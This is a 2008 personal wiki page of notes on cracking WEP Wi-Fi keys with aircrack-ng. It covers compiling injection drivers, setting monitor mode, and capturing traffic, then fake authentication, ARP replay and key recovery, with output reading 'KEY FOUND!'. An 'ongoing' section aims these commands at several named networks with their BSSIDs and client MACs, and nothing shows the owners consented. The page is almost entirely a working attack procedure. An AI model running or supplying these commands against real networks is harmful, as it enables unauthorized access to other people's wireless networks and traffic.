Aircrack

From Halfface
Revision as of 13:13, 20 October 2008 by Ekaanbj (talk | contribs) (→‎ongoing)
Jump to navigation Jump to search

Install aircrack-ng

yum -y install aircrack-ng

For compiling injection drivers.

yum -y install kernel-headers

Optionally install kismet.

yum -y install kismet

compile injection enabled drivers

rt73

wget http://homepages.tu-darmstadt.de/~p_larbig/wlan/rt73-k2wrlz-2.0.1.tar.bz2
tar -xjf rt73-k2wrlz-2.0.1.tar.bz2
cd rt73-k2wrlz-2.0.1/Module
make
make install
modprobe rt73
rt73usb-firmware-1.8-4.noarch

rt61

wget http://rt2x00.serialmonkey.com/rt61-cvs-daily.tar.gz
tar xvfz rt61-cvs-daily.tar.gz
cd rt61-cvs-*
cd Module
make
make install
rt61pci-firmware-1.2-4.noarch

madwifi-ng

svn -r 2834 checkout http://svn.madwifi.org/madwifi/trunk/ madwifi-ng2834
wget http://patches.aircrack-ng.org/madwifi-ng-r2277.patch
cd madwifi-ng2834
patch -Np1 -i ../madwifi-ng-r2277.patch
./scripts/madwifi-unload
make
make install
depmod -ae
modprobe ath_pci

Tweak network driver

Enable monitor mode and injection.

  • ralink
ifconfig rausb0 up
iwconfig rausb0 mode monitor
iwpriv rausb0 rfmontx 1

Change speed on network card.

iwconfig rausb0 rate 1M
  • atheros
ifconfig ath0 down
wlanconfig ath0 destroy
wlanconfig ath create wlandev wifi0 wlanmode monitor [sta|adhoc|ap|monitor|wds|ahdemo]

or

airmon-ng stop ath0
airmon-ng start wifi0 6

Crack wep key

Start kismet and capture the following data.

Name    : default
ESSID   : default
BSSID   : 00:13:46:4B:37:DE
Channel : 6
clientmac: 00:16:CE:4C:B7:53

Edit this file to make kismet start.

  • /etc/kismet/kismet.conf
source=iwl4965,wlan0,addme
source=rt73,wlan1,wlan1
source=rt73,rausb0,rausb0
source=rt2500,rausb0,RT73

Write comunication from ap.

airodump-ng --write wifi-network1 --channel 11 --bssid 00:90:4C:7E:00:6E rausb0

Assosiate with access point.

aireplay-ng -1 0 -e MASO -a 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0
07:46:14  Waiting for beacon frame (BSSID: 00:90:4C:7E:00:6E)
07:46:14  Sending Authentication Request
07:46:14  Authentication successful
07:46:14  Sending Association Request
07:46:14  Association successful :-)

Generate network comunication.

aireplay-ng --arpreplay -b 00:90:4C:7E:00:6E -h 00:1B:11:BC:D5:1B rausb0

Crack web key.

aircrack-ng -z -b 00:90:4C:7E:00:6E wifi-network1*.cap
KEY FOUND! [ D8:BB:EC:7D:4C ]

ongoing

airmon-ng stop ath0
airmon-ng start wifi0 6
capture iv:s. 
airodump-ng -c 6 --bssid 00:13:46:4B:37:DE -w airdump-ng-defaul ath0
fake authentication -e name -a -a access point MAC address -h 
aireplay-ng -1 0 -e default -a 00:14:6C:7E:40:80 -h 00:40:96:a6:ca:1c ath0
aireplay-ng -1 0 -e default -a 00:13:46:4B:37:DE -h 06:40:96:A6:CA:1C ath0
aireplay-ng -3 -b 00:13:46:4B:37:DE -h 00:16:CE:4C:B7:53 ath0
Name    : B2_private_49
SSID    : B2_private_49
BSSID   : 00:01:38:9A:91:EC
Channel : 11
Name    : linksys
SSID    : linksys
BSSID   : 00:1C:10:52:47:AF
clients : 00:1C:10:52:47:AD 00:14:A5:02:D9:22
Channel : 11

BLT

Name    : RCHEH
BSSID   : 00:09:5B:70:90:BA
Channel : 6
airodump-ng --write RCHEH --channel 6 --bssid 00:09:5B:70:90:BA rausb0
aireplay-ng -1 0 -e RCHEH -a 00:09:5B:70:90:BA -h 00:1B:11:BC:D5:1B rausb0
Name    : Sigge
BSSID   : 00:14:6C:7A:86:28
Channel : 11
airodump-ng --write Sigge --channel 11 --bssid 00:14:6C:7A:86:28 rausb0
aireplay-ng -1 0 -e Sigge -a 00:14:6C:7A:86:28 -h 00:1B:11:BC:D5:1B rausb0
Name    : F:s trådlösa
BSSID   : 00:15:E9:E1:1B:C5
Channel : 6
Client     : 01:00:5E:7F:FF:FA 
airodump-ng --write "F:s trådlösa" --channel 6 --bssid 00:15:E9:E1:1B:C5 rausb0
aireplay-ng -1 0 -e "F:s trådlösa" -a 00:15:E9:E1:1B:C5 -h 00:1B:11:BC:D5:1B rausb0

Application Crack